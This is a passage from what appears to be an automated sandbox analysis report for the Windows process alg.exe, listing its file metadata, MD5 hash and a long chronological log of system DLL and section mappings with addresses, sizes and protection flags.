Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1631865845
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1631968548
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1632007238
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1632017459
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1632210606
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1632475265
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1632513613
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1632571552
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1632682572
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1632690221
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1632696323
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1030000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1633254484
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1633346008
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1633350673
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1633452820
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1633460563
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1633462886
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1633532245
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1633632046
Section loaded	Path: C:\WINDOWS\system32\netmsg.dll Access: query and write and read and execute Type: image Baseaddress: 71B40000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1635301896

Analysis File: alg.exe PID: 2848 Parent PID: 668

Sections

General
Start time:	07:41:24
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\alg.exe
Commandline:	not known
Imagebase:	0x1000000
File size:	44544 bytes
MD5 hash:	8C515081584A38AA007909CD02020B3D

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
C:\WINDOWS\system32\atl.dll	query and write and read and execute	image	76B20000	69632	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\wsock32.dll	query and write and read and execute	image	71AD0000	36864	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2_32.dll	query and write and read and execute	image	71AB0000	94208	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2help.dll	query and write and read and execute	image	71AA0000	32768	own pid	read write	success or wait	1
C:\WINDOWS\system32\mswsock.dll	query and write and read and execute	image	71A50000	258048	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	630000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	630000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	630000	618496	own pid	readonly	success or wait	1
C:\WINDOWS\system32\rpcss.dll	write and read and execute	commit	670000	401408	own pid	execute	success or wait	1
C:\WINDOWS\system32\clbcatq.dll	query and write and read and execute	image	76FD0000	520192	own pid	read write	success or wait	1
C:\WINDOWS\system32\comres.dll	query and write and read and execute	image	77050000	806912	own pid	read write	success or wait	1
C:\WINDOWS\system32\winlogon.exe	write and read and execute	commit	680000	507904	own pid	execute	success or wait	1
C:\WINDOWS\system32\xpsp2res.dll	query and write and read and execute	image	680000	2904064	own pid	read write	image not at base	1
C:\WINDOWS\system32\xpsp2res.dll	query and write and read and execute	image	680000	2904064	own pid	read write	conflicting addresses	1
C:\WINDOWS\system32\hnetcfg.dll	write and read and execute	commit	A10000	344064	own pid	execute	success or wait	1
C:\WINDOWS\system32\hnetcfg.dll	query and write and read and execute	image	662B0000	360448	own pid	read write	success or wait	1
C:\WINDOWS\system32\wshtcpip.dll	write and read and execute	commit	A50000	20480	own pid	execute	success or wait	1
C:\WINDOWS\system32\wshtcpip.dll	query and write and read and execute	image	71A90000	32768	own pid	read write	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1635368064
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1635418827
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1635655344
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1635677237
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1635692453
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1635835523
Section loaded	Path: C:\WINDOWS\system32\atl.dll Access: query and write and read and execute Type: image Baseaddress: 76B20000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1635914449
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1635927418
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1635944153
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1636108297
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1636185558
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1636349465
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1636478414
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1636729599
Section loaded	Path: C:\WINDOWS\system32\wsock32.dll Access: query and write and read and execute Type: image Baseaddress: 71AD0000 Size: 36864 Protection: read write Mapped to pid: own pid	success or wait	1636850052
Section loaded	Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	1636862839
Section loaded	Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1636892518
Section loaded	Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid	success or wait	1636989009
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1637037733
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1637111692
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1637346452
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1637352083
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1637356859
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1637443254
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1637464384
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1638097344
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1638192520
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1638307661
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1638533989
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1638560705
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1638568203
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1638778115
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1638785705
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1638790218
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 630000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1639657408
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 630000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1639735521
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1639749717
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1639781460
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1639961895
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1639981155
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1640037162
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 630000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1640157575
Section loaded	Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 670000 Size: 401408 Protection: execute Mapped to pid: own pid	success or wait	1640486988
Section loaded	Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid	success or wait	1640564420
Section loaded	Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid	success or wait	1640592987
Section loaded	Path: C:\WINDOWS\system32\winlogon.exe Access: write and read and execute Type: commit Baseaddress: 680000 Size: 507904 Protection: execute Mapped to pid: own pid	success or wait	1640795545
Section loaded	Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 680000 Size: 2904064 Protection: read write Mapped to pid: own pid	image not at base	1640807663
Section loaded	Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 680000 Size: 2904064 Protection: read write Mapped to pid: own pid	conflicting addresses	1640822768
Section loaded	Path: C:\WINDOWS\system32\hnetcfg.dll Access: write and read and execute Type: commit Baseaddress: A10000 Size: 344064 Protection: execute Mapped to pid: own pid	success or wait	1641207907
Section loaded	Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1641210681
Section loaded	Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: A50000 Size: 20480 Protection: execute Mapped to pid: own pid	success or wait	1642216498
Section loaded	Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1642219028